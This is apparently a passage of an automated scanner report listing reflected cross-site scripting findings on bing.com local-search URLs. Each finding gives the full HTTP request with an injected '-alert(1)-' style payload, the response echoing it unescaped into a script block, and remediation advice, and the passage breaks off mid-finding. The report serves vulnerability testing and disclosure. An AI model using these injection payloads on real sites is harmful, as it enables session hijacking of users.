<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
e=or3,preallocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/e9bd9'-alert(1)-'44a4f985b0&/undefined/js';</script>
...[SNIP]...

1.7. http://www.bing.com/local/aa461'-alert(&/undefined/js/LSV.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bing.com
Path:   /local/aa461'-alert(&/undefined/js/LSV.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3ca30(a)67f9e9f5af0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/aa461'-alert(3ca30(a)67f9e9f5af0&/undefined/js/LSV.js?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/aa461'-alert(&/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VE_LSV=cache=0; BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; RMS=F=OC; _FP=; _SS=SID=713CCBFE4D6548D4AE8F9347FCE50360; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: dedc4fa85fb14b69992479659eba3523
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001206
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:09:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert(3ca30(a)67f9e9f5af0&/undefined/js
Content-Length: 17710


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
cation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/aa461'-alert(3ca30(a)67f9e9f5af0&/undefined/js';</script>
...[SNIP]...

1.8. http://www.bing.com/local/assetgeneration.handler/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/assetgeneration.handler/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac766'-alert(1)-'39ecd17fea0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/ac766'-alert(1)-'39ecd17fea0/?key=details.aag.cat.cc.pjAttr.rat.ot.sum.sf.ri.da.fea.sc.pho.rvws.wr.cou.offer.ads.sho.rat.rat.rat.rat.rat.rat.rat.rat.rat.rat.rat.ads.&type=text%2fcss&mkt=en-us&cb%3d20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/details.aspx?lid=YN165x3137627&q=Restaurants&qt=yp&tid=de23686c9d194a6fb644dc125b68270e&FORM=LLSV
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: e0c3531d4ad64e308c89c74aaee5f9e1
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001202
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:38:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/ac766'-alert(1)-'39ecd17fea0
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Content-Length: 18198


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
e=or3,preallocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/ac766'-alert(1)-'39ecd17fea0';</script>
...[SNIP]...

1.9. http://www.bing.com/local/assets/img/sprites/amenities.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/assets/img/sprites/amenities.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b35b'-alert(1)-'4e1f1451794 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/assets3b35b'-alert(1)-'4e1f1451794/img/sprites/amenities.png?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/details.aspx?lid=YN165x3137627&q=Restaurants&qt=yp&tid=de23686c9d194a6fb644dc125b68270e&FORM=LLSV
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 5033cca2a9fd48968ff9e958ac1f5883
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001203
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:38:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/assets3b35b'-alert(1)-'4e1f1451794/img/sprites
Content-Length: 17672


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
preallocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/assets3b35b'-alert(1)-'4e1f1451794/img/sprites';</script>
...[SNIP]...

1.10. http://www.bing.com/local/assets/img/sprites/amenities.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/assets/img/sprites/amenities.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73f6d'-alert(1)-'d3c3a0bfc13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/assets/img73f6d'-alert(1)-'d3c3a0bfc13/sprites/amenities.png?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/details.aspx?lid=YN165x3137627&q=Restaurants&qt=yp&tid=de23686c9d194a6fb644dc125b68270e&FORM=LLSV
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 07e27e9ee526487ca43ff8c3fd735cf7
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001209
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:38:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/assets/img73f6d'-alert(1)-'d3c3a0bfc13/sprites
Content-Length: 17682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
llocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/assets/img73f6d'-alert(1)-'d3c3a0bfc13/sprites';</script>
...[SNIP]...

1.11. http://www.bing.com/local/assets/img/sprites/amenities.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/assets/img/sprites/amenities.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3b0d'-alert(1)-'cf7be748382 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/assets/img/spritese3b0d'-alert(1)-'cf7be748382/amenities.png?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/details.aspx?lid=YN165x3137627&q=Restaurants&qt=yp&tid=de23686c9d194a6fb644dc125b68270e&FORM=LLSV
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: e605f62d070745d891e4c3f69f4ac3e3
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001208
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:38:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/assets/img/spritese3b0d'-alert(1)-'cf7be748382
Content-Length: 17677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
n=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/assets/img/spritese3b0d'-alert(1)-'cf7be748382';</script>
...[SNIP]...

1.12. http://www.bing.com/local/assets/img/sprites/details.sprite.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/assets/img/sprites/details.sprite.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27cc6'-alert(1)-'546f87c5d57 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/assets27cc6'-alert(1)-'546f87c5d57/img/sprites/details.sprite.png?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/details.aspx?lid=YN165x3137627&q=Restaurants&qt=yp&tid=de23686c9d194a6fb644dc125b68270e&FORM=LLSV
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 43bb880c901a4bd4a9f09461411e7fda
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001211
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:38:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/assets27cc6'-alert(1)-'546f87c5d57/img/sprites
Content-Length: 17702


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
preallocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/assets27cc6'-alert(1)-'546f87c5d57/img/sprites';</script>
...[SNIP]...

1.13. http://www.bing.com/local/assets/img/sprites/details.sprite.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/assets/img/sprites/details.sprite.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f45b'-alert(1)-'00f4f3f16c3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/assets/img4f45b'-alert(1)-'00f4f3f16c3/sprites/details.sprite.png?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/details.aspx?lid=YN165x3137627&q=Restaurants&qt=yp&tid=de23686c9d194a6fb644dc125b68270e&FORM=LLSV
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 525f9a49053641148713c97ec87fb04d
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001209
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:38:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/assets/img4f45b'-alert(1)-'00f4f3f16c3/sprites
Content-Length: 17697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
llocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/assets/img4f45b'-alert(1)-'00f4f3f16c3/sprites';</script>
...[SNIP]...

1.14. http://www.bing.com/local/assets/img/sprites/details.sprite.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/assets/img/sprites/details.sprite.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25ca6'-alert(1)-'d25aca3728 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/assets/img/sprites25ca6'-alert(1)-'d25aca3728/details.sprite.png?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/details.aspx?lid=YN165x3137627&q=Restaurants&qt=yp&tid=de23686c9d194a6fb644dc125b68270e&FORM=LLSV
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 48f08638c85a4e3fa500dc96cb6ac4da
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001202
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:38:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/assets/img/sprites25ca6'-alert(1)-'d25aca3728
Content-Length: 18014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
n=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/assets/img/sprites25ca6'-alert(1)-'d25aca3728';</script>
...[SNIP]...

1.15. http://www.bing.com/local/us/co/colorado%20springs/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/us/co/colorado%20springs/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0e7a'-alert(1)-'5e1b01ee50d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/usc0e7a'-alert(1)-'5e1b01ee50d/co/colorado%20springs/?&form=llsv HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/locationselector.aspx?where=aa461'-alert(String.fromCharCode(88%2c83%2c83))-'6f0e1fe887b&FORM=LLSV
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: f45d0c4dc6324e2182df53bb640e93db
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001212
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:39:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/usc0e7a'-alert(1)-'5e1b01ee50d/co/colorado%20springs
Content-Length: 17663


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
or3,preallocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/usc0e7a'-alert(1)-'5e1b01ee50d/co/colorado%20springs';</script>
...[SNIP]...

1.16. http://www.bing.com/local/us/co/colorado%20springs/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/us/co/colorado%20springs/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f22a'-alert(1)-'3bd3709716f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

